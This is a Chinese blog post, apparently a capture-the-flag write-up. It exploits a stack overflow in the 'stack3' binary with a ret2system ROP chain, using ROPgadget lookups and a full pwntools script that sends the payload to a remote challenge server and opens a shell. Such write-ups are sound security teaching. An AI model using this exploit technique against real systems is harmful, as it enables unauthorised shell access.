Lilac Pwn stack3-rop Writeup

文件类型是 64 位 ELF。

开了 NX 保护。

用 IDA64 查看一下：

可以看到可以栈溢出。

objdump -d stack3 | grep 'plt'

可以看到有 system 函数，地址为 0x400600。

ROPgadget --binary stack3 --string '/bin/sh'

可以看到有字符串 "/bin/sh"，地址为 0x4008a4。

由于是 64 位，参数先保存在 RDI，RSI，RDX，RCX，R8，R9，然后才是栈。

查看是否有可利用的 gadgets：

ROPgadget --binary stack3 --only 'pop|ret' | grep 'rdi'

找到一条。

那么可以构造 exp 了：

from pwn import *

# p = process("./stack3")
p = remote("47.94.239.235", 2023)

poprdi_addr = 0x400883
system_addr = 0x400600
binsh_addr = 0x4008a4

payload = b'a' * (0x20 + 0x8) + p64(poprdi_addr) + p64(binsh_addr) + p64(system_addr)

p.sendline(payload)

p.interactive()

可以看到成功拿到 shell。

posted @ 2020-11-01 14:29 wuli涛涛阅读(122) 评论(0) 收藏举报

刷新页面返回顶部

wuli涛涛

while(!(succeed=try()));

Lilac Pwn stack3-rop Writeup

公告